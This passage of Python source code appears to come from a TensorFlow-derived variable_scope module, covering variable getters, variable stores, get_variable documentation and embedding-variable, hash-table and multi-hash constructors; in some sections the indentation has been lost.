        dtype = self._dtype
      if invalid_key is None:
        # A non-None invalid_key is what routes var_store.get_variable to
        # the EmbeddingVariable path; -1 is the sentinel default.
        invalid_key = -1
      return var_store.get_variable(
          full_name, shape=shape, dtype=dtype, initializer=initializer,
          regularizer=regularizer, reuse=reuse, trainable=trainable,
          collections=collections, caching_device=caching_device,
          partitioner=partitioner, validate_shape=validate_shape,
          use_resource=use_resource, custom_getter=custom_getter,
          constraint=constraint, invalid_key=invalid_key,
          evconfig=evconfig,
          ht_partition_num=ht_partition_num)

  def get_dynamic_dimension_embedding_variable(self,
                                               var_store,
                                               name,
                                               shape=None,
                                               embedding_block_num=None,
                                               dtype=None,
                                               initializer=None,
                                               regularizer=None,
                                               reuse=None,
                                               trainable=True,
                                               collections=None,
                                               caching_device=None,
                                               partitioner=None,
                                               validate_shape=True,
                                               use_resource=None,
                                               custom_getter=None,
                                               constraint=None,
                                               invalid_key=None,
                                               evconfig=variables.EmbeddingVariableConfig(),
                                               ht_partition_num=1000):
    """Gets an existing variable with this name or create a new one."""
    # Fall back to this scope's defaults for any unspecified argument.
    if regularizer is None:
      regularizer = self._regularizer
    if caching_device is None:
      caching_device = self._caching_device
    if partitioner is None:
      partitioner = self._partitioner
    if custom_getter is None:
      custom_getter = self._custom_getter
    if not context.executing_eagerly():
      if reuse is None:
        reuse = self._reuse
      if use_resource is None:
        use_resource = self._use_resource
    else:
      reuse = AUTO_REUSE
      use_resource = True

    full_name = self.name + "/" + name if self.name else name
    # Variable names only depend on variable_scope (full_name here),
    # not name_scope, so we reset it below for the time of variable creation.
    with ops.name_scope(None):
      # Check that `initializer` dtype and `dtype` are consistent before
      # replacing them with defaults.
      if (dtype is not None and initializer is not None and
          not callable(initializer)):
        init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
        if init_dtype != dtype:
          raise ValueError("Initializer type '%s' and explicit dtype '%s' "
                           "don't match." % (init_dtype, dtype))
      if initializer is None:
        initializer = self._initializer
      if constraint is None:
        constraint = self._constraint
      if dtype is None:
        dtype = self._dtype
      if invalid_key is None:
        # A non-None invalid_key is what routes var_store.get_variable to
        # the EmbeddingVariable path; -1 is the sentinel default.
        invalid_key = -1
      return var_store.get_variable(
          full_name, shape=shape, embedding_block_num=embedding_block_num,
          dtype=dtype, initializer=initializer,
          regularizer=regularizer, reuse=reuse, trainable=trainable,
          collections=collections, caching_device=caching_device,
          partitioner=partitioner, validate_shape=validate_shape,
          use_resource=use_resource, custom_getter=custom_getter,
          constraint=constraint, invalid_key=invalid_key,
          evconfig=evconfig,
          ht_partition_num=ht_partition_num)

  def _get_partitioned_variable(self,
                                var_store,
                                name,
                                shape=None,
                                dtype=None,
                                initializer=None,
                                regularizer=None,
                                trainable=None,
                                collections=None,
                                caching_device=None,
                                partitioner=None,
                                validate_shape=True,
                                use_resource=None,
                                constraint=None,
                                synchronization=VariableSynchronization.AUTO,
                                aggregation=VariableAggregation.NONE):
    """Gets an existing variable with this name or create a new one."""
    # Fall back to this scope's defaults for any unspecified argument.
    if initializer is None:
      initializer = self._initializer
    if regularizer is None:
      regularizer = self._regularizer
    if constraint is None:
      constraint = self._constraint
    if caching_device is None:
      caching_device = self._caching_device
    if partitioner is None:
      partitioner = self._partitioner
    if dtype is None:
      dtype = self._dtype
    if use_resource is None:
      use_resource = self._use_resource

    if self._custom_getter is not None:
      raise ValueError(
          "Private access to _get_partitioned_variable is not allowed when "
          "a custom getter is set. Current custom getter: %s. "
          "It is likely that you're using create_partitioned_variables. "
          "If so, consider instead using get_variable with a non-empty "
          "partitioner parameter instead." % self._custom_getter)

    if partitioner is None:
      raise ValueError("No partitioner was specified")

    # This allows the variable scope name to be used as the variable name if
    # this function is invoked with an empty name arg, for backward
    # compatibility with create_partitioned_variables().
    full_name_list = []
    if self.name:
      full_name_list.append(self.name)
    if name:
      full_name_list.append(name)
    full_name = "/".join(full_name_list)

    # Variable names only depend on variable_scope (full_name here),
    # not name_scope, so we reset it below for the time of variable creation.
    with ops.name_scope(None):
      # pylint: disable=protected-access
      return var_store._get_partitioned_variable(
          full_name,
          shape=shape,
          dtype=dtype,
          initializer=initializer,
          regularizer=regularizer,
          reuse=self.reuse,
          trainable=trainable,
          collections=collections,
          caching_device=caching_device,
          partitioner=partitioner,
          validate_shape=validate_shape,
          use_resource=use_resource,
          constraint=constraint,
          synchronization=synchronization,
          aggregation=aggregation)
      # pylint: enable=protected-access
# Graph-collection keys under which the shared variable store and the
# variable scope store are stashed. Tuples are used so these keys cannot
# collide with ordinary string-named collections.
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
  """Returns the variable scope store for current thread."""
  stores = ops.get_collection(_VARSCOPESTORE_KEY)
  if stores:
    return stores[0]
  # Nothing registered yet for this graph: create a store and register it so
  # later calls return the same instance.
  new_store = _VariableScopeStore()
  ops.add_to_collection(_VARSCOPESTORE_KEY, new_store)
  return new_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
  """Returns the current variable scope."""
  scope_store = get_variable_scope_store()
  return scope_store.current_scope
def _get_default_variable_store():
  """Returns the graph-wide `_VariableStore`, creating it on first use."""
  existing = ops.get_collection(_VARSTORE_KEY)
  if not existing:
    # First access: create the store and register it in the collection.
    store = _VariableStore()
    ops.add_to_collection(_VARSTORE_KEY, store)
    return store
  return existing[0]
@tf_contextlib.contextmanager
def with_variable_store(store):
  """Temporarily makes `store` the default variable store."""
  collection = ops.get_collection_ref(_VARSTORE_KEY)
  saved = list(collection)
  collection[:] = [store]
  try:
    yield
  finally:
    # Restore whatever stores were registered before entering the context.
    collection[:] = saved
class EagerVariableStore(object):
  """Wrapper allowing functional layers to be used with eager execution.

  When eager execution is enabled, variables are deleted once they go out of
  scope and are not added to global collections by default, while a lot of
  code (mostly the functional layers in tf.layers) assumes variables are kept
  in a global list. Wrapping such code in an EagerVariableStore keeps it
  eager-friendly. For example, to create a dense layer, use:

  ```
  container = tfe.EagerVariableStore()
  for input in dataset_iterator:
    with container.as_default():
      x = tf.compat.v1.layers.dense(input, name="l1")
  print(container.variables)  # Should print the variables used in the layer.
  ```
  """

  def __init__(self, store=None):
    if store is None:
      # Fresh store that records eager variables.
      # pylint: disable=protected-access
      new_store = _VariableStore()
      new_store._store_eager_variables = True
      # pylint: enable=protected-access
      self._store = new_store
    else:
      if not store._store_eager_variables:  # pylint: disable=protected-access
        raise ValueError("Cannot construct EagerVariableStore from a "
                         "VariableStore object that does not hold eager "
                         "variables.")
      self._store = store

  def as_default(self):
    return with_variable_store(self._store)

  def variables(self):
    # pylint: disable=protected-access
    return sorted(self._store._vars.values(), key=lambda v: v.name)
    # pylint: enable=protected-access

  def trainable_variables(self):
    # pylint: disable=protected-access
    trainable = [v for v in self._store._vars.values() if v.trainable]
    # pylint: enable=protected-access
    return sorted(trainable, key=lambda v: v.name)

  def non_trainable_variables(self):
    # pylint: disable=protected-access
    frozen = [v for v in self._store._vars.values() if not v.trainable]
    # pylint: enable=protected-access
    return sorted(frozen, key=lambda v: v.name)

  def copy(self):
    """Copy this variable store and all of its contents.

    Variables contained in this store will be copied over to the new variable
    store, meaning that they can be modified without affecting the variables in
    this store.

    Returns:
      A new EagerVariableStore instance containing copied variables.
    """
    # pylint: disable=protected-access
    new_store = EagerVariableStore()
    for key, var in iteritems(self._store._vars):
      # Strip the device suffix (":<n>") out of the variable name, if present.
      colon = var.name.find(":")
      stripped_var_name = var.name if colon == -1 else var.name[:colon]
      # Create new variable with same value, name, and "trainable" flag.
      new_var = resource_variable_ops.ResourceVariable(
          var.read_value(), name=stripped_var_name, trainable=var.trainable)
      new_store._store._vars[key] = new_var
    return new_store
    # pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
                 shape=None,
                 dtype=None,
                 initializer=None,
                 regularizer=None,
                 trainable=None,
                 collections=None,
                 caching_device=None,
                 partitioner=None,
                 validate_shape=True,
                 use_resource=None,
                 custom_getter=None,
                 constraint=None,
                 synchronization=VariableSynchronization.AUTO,
                 aggregation=VariableAggregation.NONE):
  # The public docstring is attached below via
  # `get_variable_or_local_docstring`; this body just delegates to the
  # current variable scope backed by the default variable store.
  scope = get_variable_scope()
  var_store = _get_default_variable_store()
  return scope.get_variable(
      var_store,
      name,
      shape=shape,
      dtype=dtype,
      initializer=initializer,
      regularizer=regularizer,
      trainable=trainable,
      collections=collections,
      caching_device=caching_device,
      partitioner=partitioner,
      validate_shape=validate_shape,
      use_resource=use_resource,
      custom_getter=custom_getter,
      constraint=constraint,
      synchronization=synchronization,
      aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.", "",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable(  # pylint: disable=missing-docstring
    name,
    shape=None,
    dtype=None,
    initializer=None,
    regularizer=None,
    trainable=False,  # pylint: disable=unused-argument
    collections=None,
    caching_device=None,
    partitioner=None,
    validate_shape=True,
    use_resource=None,
    custom_getter=None,
    constraint=None,
    synchronization=VariableSynchronization.AUTO,
    aggregation=VariableAggregation.NONE):
  # Public docstring is attached below via `get_variable_or_local_docstring`.
  # Build a fresh list instead of `collections += [...]`: augmented assignment
  # would mutate a list passed in by the caller as a side effect.
  if collections:
    collections = list(collections) + [ops.GraphKeys.LOCAL_VARIABLES]
  else:
    collections = [ops.GraphKeys.LOCAL_VARIABLES]
  # Local variables are never trainable, regardless of the (ignored)
  # `trainable` argument kept for signature parity with `get_variable`.
  return get_variable(
      name,
      shape=shape,
      dtype=dtype,
      initializer=initializer,
      regularizer=regularizer,
      trainable=False,
      collections=collections,
      caching_device=caching_device,
      partitioner=partitioner,
      validate_shape=validate_shape,
      use_resource=use_resource,
      synchronization=synchronization,
      aggregation=aggregation,
      custom_getter=custom_getter,
      constraint=constraint)
# Render the shared template for `get_local_variable`: local variables go to
# the LOCAL_VARIABLES collection, there is no `trainable` entry (always
# False), and LOCAL_VARIABLES is the default collection.
get_local_variable.__doc__ = get_variable_or_local_docstring % (
    "Gets an existing *local* variable or creates a new one.",
    "Behavior is the same as in `get_variable`, except that variables are\n"
    "added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
    "`False`.\n", "", "GraphKeys.LOCAL_VARIABLES")
@tf_export(v1=["get_hash_table"])
def get_hash_table(name,
                   embedding_dim,
                   dtype=None,
                   initializer=None,
                   collections=None,
                   trainable=True,
                   synchronization=VariableSynchronization.AUTO,
                   partitioner=None,
                   children=None):
  """Gets or creates a hash table via the current variable scope."""
  scope = get_variable_scope()
  var_store = _get_default_variable_store()
  return scope.get_hash_table(
      var_store,
      name,
      shape=embedding_dim,
      dtype=dtype,
      initializer=initializer,
      collections=collections,
      trainable=trainable,
      synchronization=synchronization,
      partitioner=partitioner,
      children=children)
@tf_export(v1=["get_embedding_variable"])
def get_embedding_variable(name,
                           embedding_dim,
                           key_dtype=dtypes.int64,
                           value_dtype=None,
                           initializer=None,
                           regularizer=None,
                           trainable=True,
                           collections=None,
                           caching_device=None,
                           partitioner=None,
                           validate_shape=True,
                           custom_getter=None,
                           constraint=None,
                           steps_to_live=None,
                           init_data_source=None,
                           ev_option=None):
  """Gets an existing embedding variable with these parameters or creates one.

  Args:
    name: Name of the embedding variable.
    embedding_dim: Dimension (shape) of each embedding value.
    key_dtype: dtype of the lookup keys; one of int64/int32/string.
    value_dtype: dtype of the embedding values.
    initializer: Initializer for newly created values; defaults to a
      truncated normal initializer.
    regularizer: Optional regularizer function.
    trainable: If `True` add the variable to TRAINABLE_VARIABLES.
    collections: List of graph collection keys to add the variable to.
    caching_device: Optional device string or function for read caching.
    partitioner: Optional partitioner callable.
    validate_shape: Whether the initial value's shape must be known.
    custom_getter: Optional getter override.
    constraint: Optional projection function applied after optimizer updates.
    steps_to_live: Deprecated; use `tf.GlobalStepEvict(steps_to_live)` via
      `ev_option` instead.
    init_data_source: Optional external data source for initialization.
    ev_option: `variables.EmbeddingVariableOption` controlling eviction,
      filtering and storage. When None a fresh default option is built.

  Returns:
    The created or existing embedding variable.

  Raises:
    ValueError: if `key_dtype` is unsupported, or if both `steps_to_live` and
      an L2-weight eviction threshold are enabled at the same time.
  """
  if ev_option is None:
    # Construct the default per call: a default-argument instance would be a
    # single mutable object silently shared across every call (mutable
    # default argument pitfall).
    ev_option = variables.EmbeddingVariableOption()
  # Sentinel key used to mark "missing" entries, chosen per key dtype.
  if key_dtype == dtypes.int64:
    invalid_key = 9223372036854775807
  elif key_dtype == dtypes.int32:
    invalid_key = -1
  elif key_dtype == dtypes.string:
    invalid_key = ""
  else:
    raise ValueError("Not support key_dtype: %s, only support int64/int32/string" % key_dtype)
  l2_weight_threshold = -1.0
  if initializer is None:
    initializer = init_ops.truncated_normal_initializer()
  if steps_to_live is not None:
    logging.warning("steps_to_live is deprecated,"
                    " use tf.GlobalStepEvict(steps_to_live)")
  if ev_option.evict is not None:
    if isinstance(ev_option.evict, variables.GlobalStepEvict):
      if steps_to_live is not None:
        logging.warning("Warning: steps_to_live is double set, the steps_to_live in GlobalStepEvict is valid")
      # The eviction config takes precedence over the deprecated argument.
      steps_to_live = ev_option.evict.steps_to_live
    elif isinstance(ev_option.evict, variables.L2WeightEvict):
      l2_weight_threshold = ev_option.evict.l2_weight_threshold
  if steps_to_live is not None and l2_weight_threshold > 0:
    raise ValueError("step_to_live and l2_weight_threshold can't be enabled at same time.")
  return get_variable_scope().get_embedding_variable(
      _get_default_variable_store(), name, shape=embedding_dim, dtype=value_dtype,
      initializer=initializer, regularizer=regularizer, trainable=trainable,
      collections=collections, caching_device=caching_device,
      partitioner=partitioner, validate_shape=validate_shape,
      use_resource=True, custom_getter=custom_getter,
      constraint=constraint, invalid_key=invalid_key,
      evconfig=variables.EmbeddingVariableConfig(
          steps_to_live=steps_to_live, init_data_source=init_data_source,
          ht_type=ev_option.ht_type,
          l2_weight_threshold=l2_weight_threshold,
          filter_strategy=ev_option.filter_strategy,
          storage_type=ev_option.storage_option.storage_type),
      ht_partition_num=ev_option.ht_partition_num)
#@tf_export(v1=["get_embedding_variable"])
def get_embedding_variable_internal(name,
                                    embedding_dim,
                                    key_dtype=dtypes.int64,
                                    value_dtype=None,
                                    initializer=None,
                                    regularizer=None,
                                    trainable=True,
                                    collections=None,
                                    caching_device=None,
                                    partitioner=None,
                                    validate_shape=True,
                                    custom_getter=None,
                                    constraint=None,
                                    steps_to_live=None,
                                    init_data_source=None,
                                    ev_option=None):
  """Internal variant of `get_embedding_variable` (not exported).

  Same semantics as `get_embedding_variable`, minus the deprecation warning
  for `steps_to_live`. See that function for argument documentation.

  Raises:
    ValueError: if `key_dtype` is unsupported, or if both `steps_to_live` and
      an L2-weight eviction threshold are enabled at the same time.
  """
  if ev_option is None:
    # Construct the default per call instead of as a default argument; a
    # default-argument instance would be mutable state shared by all calls.
    ev_option = variables.EmbeddingVariableOption()
  # Sentinel key used to mark "missing" entries, chosen per key dtype.
  if key_dtype == dtypes.int64:
    invalid_key = 9223372036854775807
  elif key_dtype == dtypes.int32:
    invalid_key = -1
  elif key_dtype == dtypes.string:
    invalid_key = ""
  else:
    raise ValueError("Not support key_dtype: %s, only support int64/int32/string" % key_dtype)
  l2_weight_threshold = -1.0
  if initializer is None:
    initializer = init_ops.truncated_normal_initializer()
  if ev_option.evict is not None:
    if isinstance(ev_option.evict, variables.GlobalStepEvict):
      if steps_to_live is not None:
        logging.warning("Warning: steps_to_live is double set, the steps_to_live in EvcitConfig is valid")
      # The eviction config takes precedence over the argument.
      steps_to_live = ev_option.evict.steps_to_live
    elif isinstance(ev_option.evict, variables.L2WeightEvict):
      l2_weight_threshold = ev_option.evict.l2_weight_threshold
  if steps_to_live is not None and l2_weight_threshold > 0:
    raise ValueError("step_to_live and l2_weight_threshold can't be enabled at same time.")
  return get_variable_scope().get_embedding_variable(
      _get_default_variable_store(), name, shape=embedding_dim, dtype=value_dtype,
      initializer=initializer, regularizer=regularizer, trainable=trainable,
      collections=collections, caching_device=caching_device,
      partitioner=partitioner, validate_shape=validate_shape,
      use_resource=True, custom_getter=custom_getter,
      constraint=constraint, invalid_key=invalid_key,
      evconfig=variables.EmbeddingVariableConfig(
          steps_to_live=steps_to_live, init_data_source=init_data_source,
          ht_type=ev_option.ht_type,
          l2_weight_threshold=l2_weight_threshold,
          filter_strategy=ev_option.filter_strategy,
          storage_type=ev_option.storage_option.storage_type),
      ht_partition_num=ev_option.ht_partition_num)
#@tf_export(v1=["get_embedding_variable_v2"])
def get_embedding_variable_v2_internal(name,
                                       embedding_dim,
                                       key_dtype=dtypes.int64,
                                       value_dtype=None,
                                       initializer=None,
                                       regularizer=None,
                                       trainable=True,
                                       collections=None,
                                       caching_device=None,
                                       partitioner=None,
                                       validate_shape=True,
                                       custom_getter=None,
                                       constraint=None,
                                       evconfig=None,
                                       ht_partition_num=1000):
  """Internal v2 variant of `get_embedding_variable` taking a raw config.

  Same delegation as `get_embedding_variable_internal`, but the caller passes
  a fully-built `variables.EmbeddingVariableConfig` directly.

  Raises:
    ValueError: if `key_dtype` is not one of int64/int32/string.
  """
  if evconfig is None:
    # Construct the default per call; a default-argument instance would be a
    # single mutable config object shared across every call.
    evconfig = variables.EmbeddingVariableConfig()
  # Sentinel key used to mark "missing" entries, chosen per key dtype.
  if key_dtype == dtypes.int64:
    invalid_key = 9223372036854775807
  elif key_dtype == dtypes.int32:
    invalid_key = -1
  elif key_dtype == dtypes.string:
    invalid_key = ""
  else:
    raise ValueError("Not support key_dtype: %s, only support int64/int32/string" % key_dtype)
  if initializer is None:
    initializer = init_ops.truncated_normal_initializer()
  return get_variable_scope().get_embedding_variable(
      _get_default_variable_store(), name, shape=embedding_dim, dtype=value_dtype,
      initializer=initializer, regularizer=regularizer, trainable=trainable,
      collections=collections, caching_device=caching_device,
      partitioner=partitioner, validate_shape=validate_shape,
      use_resource=True, custom_getter=custom_getter,
      constraint=constraint, invalid_key=invalid_key,
      evconfig=evconfig,
      ht_partition_num=ht_partition_num)
@tf_export(v1=["get_multihash_variable"])
def get_multihash_variable(name,
                           dims,
                           complementary_strategy="Q-R",
                           operation="add",
                           dtype=float,
                           initializer=None,
                           regularizer=None,
                           trainable=None,
                           collections=None,
                           caching_device=None,
                           partitioner=None,
                           validate_shape=True,
                           use_resource = None,
                           custom_getter=None,
                           constraint=None,
                           synchronization=VariableSynchronization.AUTO,
                           aggregation=VariableAggregation.NONE):
  """Gets or creates a multi-hash variable built from Q/R component variables."""
  num_of_partitions = len(dims)
  # Validate the decomposition strategy and the combine operation up front.
  if complementary_strategy not in ("Q-R",):
    raise ValueError("The strategy %s is not supported" % complementary_strategy)
  if operation not in ("add", "mul", "concat"):
    raise ValueError("The operation %s is not supported" % operation)
  if initializer is None:
    initializer = init_ops.truncated_normal_initializer()
  if complementary_strategy == 'Q-R':
    if num_of_partitions != 2:
      raise ValueError("the num_of_partitions must be 2 when using Q-R strategy.")
    scope = get_variable_scope()
    store = _get_default_variable_store()
    # All options except name/shape are identical for the Q and R components.
    shared_kwargs = dict(
        dtype=dtype, initializer=initializer, regularizer=regularizer,
        trainable=trainable, collections=collections,
        caching_device=caching_device, partitioner=partitioner,
        validate_shape=validate_shape, use_resource=use_resource,
        custom_getter=custom_getter, constraint=constraint,
        synchronization=synchronization, aggregation=aggregation)
    val_q = scope.get_variable(
        store, name + '/multhash_Q', shape=dims[0], **shared_kwargs)
    val_r = scope.get_variable(
        store, name + '/multhash_R', shape=dims[1], **shared_kwargs)
    return kv_variable_ops.MultiHashVariable(
        name, [val_q, val_r],
        variables.MultihashOption(num_of_partitions,
                                  complementary_strategy,
                                  operation,
                                  dims))
@tf_export(v1=["get_dynamic_dimension_embedding_variable"])
def get_dynamic_dimension_embedding_variable(name,
                                             embedding_block_dimension,
                                             embedding_block_num,
                                             key_dtype=dtypes.int64,
                                             value_dtype=None,
                                             initializer=None,
                                             regularizer=None,
                                             trainable=True,
                                             collections=None,
                                             caching_device=None,
                                             partitioner=None,
                                             validate_shape=True,
                                             custom_getter=None,
                                             constraint=None,
                                             steps_to_live=None,
                                             init_data_source=None,
                                             ht_partition_num=1000,
                                             storage_type=None):
  """Gets or creates an embedding variable with a dynamic value dimension."""

  def _invalid_key():
    # Sentinel "missing" key, selected per supported key dtype.
    if key_dtype == dtypes.int64:
      return 9223372036854775807
    if key_dtype == dtypes.int32:
      return -1
    if key_dtype == dtypes.string:
      return ""
    raise ValueError("Not support key_dtype: %s, only support int64/int32/string" % key_dtype)

  invalid_key = _invalid_key()
  if initializer is None:
    initializer = init_ops.truncated_normal_initializer()
  scope = get_variable_scope()
  return scope.get_dynamic_dimension_embedding_variable(
      _get_default_variable_store(), name,
      shape=embedding_block_dimension,
      embedding_block_num=embedding_block_num,
      dtype=value_dtype,
      initializer=initializer, regularizer=regularizer, trainable=trainable,
      collections=collections, caching_device=caching_device,
      partitioner=partitioner, validate_shape=validate_shape,
      use_resource=True, custom_getter=custom_getter,
      constraint=constraint, invalid_key=invalid_key,
      evconfig=variables.EmbeddingVariableConfig(
          steps_to_live=steps_to_live, init_data_source=init_data_source,
          storage_type=storage_type),
      ht_partition_num=ht_partition_num)
def _get_partitioned_variable(name,
                              shape=None,
                              dtype=None,
                              initializer=None,
                              regularizer=None,
                              trainable=True,
                              collections=None,
                              caching_device=None,
                              partitioner=None,
                              validate_shape=True,
                              use_resource=None,
                              constraint=None,
                              synchronization=VariableSynchronization.AUTO,
                              aggregation=VariableAggregation.NONE):
  """Gets or creates a sharded variable list with these parameters.

  The `partitioner` must be a callable that accepts a fully defined
  `TensorShape` and returns a sequence of integers (the `partitions`): these
  describe how to shard the `Variable` along one dimension — e.g.
  `partitions[1] = 3` splits it into 3 shards along dimension 1. Sharding
  along only a single axis is currently supported.

  If a list of variables with the given name (prefix) is already stored, the
  stored variables are returned; otherwise new ones are created. If the
  initializer is `None` (the default), the default initializer from the
  constructor is used; if that is also `None`, a fresh
  `glorot_uniform_initializer` is used. A Tensor initializer supplies both the
  value and the shape. A callable initializer is invoked once per shard;
  otherwise the initializer must match the shape of the entire sharded
  Variable and is sliced per shard.

  Some useful partitioners are available. See, e.g.,
  `variable_axis_size_partitioner` and `min_max_variable_partitioner`.

  Args:
    name: The name of the new or existing variable.
    shape: Shape of the new or existing variable.
    dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
    initializer: Initializer for the variable if one is created.
    regularizer: A (Tensor -> Tensor or None) function; the result of applying
      it on a newly created variable is added to the collection
      GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
    trainable: If `True` also add the variable to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
    collections: List of graph collections keys to add the Variable to.
      Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
    caching_device: Optional device string or function describing where the
      Variable should be cached for reading. Defaults to the Variable's
      device; if not `None`, caches on another device.
    partitioner: Optional callable that accepts a fully defined `TensorShape`
      and `dtype` of the Variable to be created, and returns a list of
      partitions for each axis (currently only one axis can be partitioned).
    validate_shape: If False, allows the variable to be initialized with a
      value of unknown shape. If True, the default, the shape of initial_value
      must be known.
    use_resource: If False, creates a regular Variable. If True, creates an
      experimental ResourceVariable instead which has well-defined semantics.
      Defaults to False (will later change to True).
    constraint: An optional projection function applied to the variable after
      an `Optimizer` update (e.g. to implement norm or value constraints for
      layer weights). It takes the unprojected variable value and must return
      the projected value with the same shape. Constraints are not safe to use
      when doing asynchronous distributed training.
    synchronization: Indicates when a distributed variable will be aggregated.
      Accepted values are constants defined in the class
      `tf.VariableSynchronization`. By default the synchronization is set to
      `AUTO` and the current `DistributionStrategy` chooses when to
      synchronize.
    aggregation: Indicates how a distributed variable will be aggregated.
      Accepted values are constants defined in the class
      `tf.VariableAggregation`.

  Returns:
    A tuple `(shards, partitions)` where `shards` is the list of `Variable`
    shards and `partitions` is the output of the partitioner on the input
    shape.

  Raises:
    ValueError: when creating a new variable and shape is not declared, or when
      violating reuse during variable creation. Reuse is set inside
      `variable_scope`.
  """
  scope = get_variable_scope()
  # Partitioned variables bypass the public getter machinery, so they cannot
  # be combined with a custom getter.
  if scope.custom_getter is not None:
    raise ValueError(
        "Private access to _get_partitioned_variable is not allowed when "
        "a custom getter is set. Current custom getter: %s. "
        "It is likely that you're using create_partitioned_variables. "
        "If so, consider instead using get_variable with a non-empty "
        "partitioner parameter instead." % scope.custom_getter)
  # pylint: disable=protected-access
  return scope._get_partitioned_variable(
      _get_default_variable_store(), name,
      shape=shape, dtype=dtype,
      initializer=initializer, regularizer=regularizer,
      trainable=trainable, collections=collections,
      caching_device=caching_device, partitioner=partitioner,
      validate_shape=validate_shape, use_resource=use_resource,
      constraint=constraint, synchronization=synchronization,
      aggregation=aggregation)
  # pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.compat.v1.AUTO_REUSE; if `None`, we inherit
the parent scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
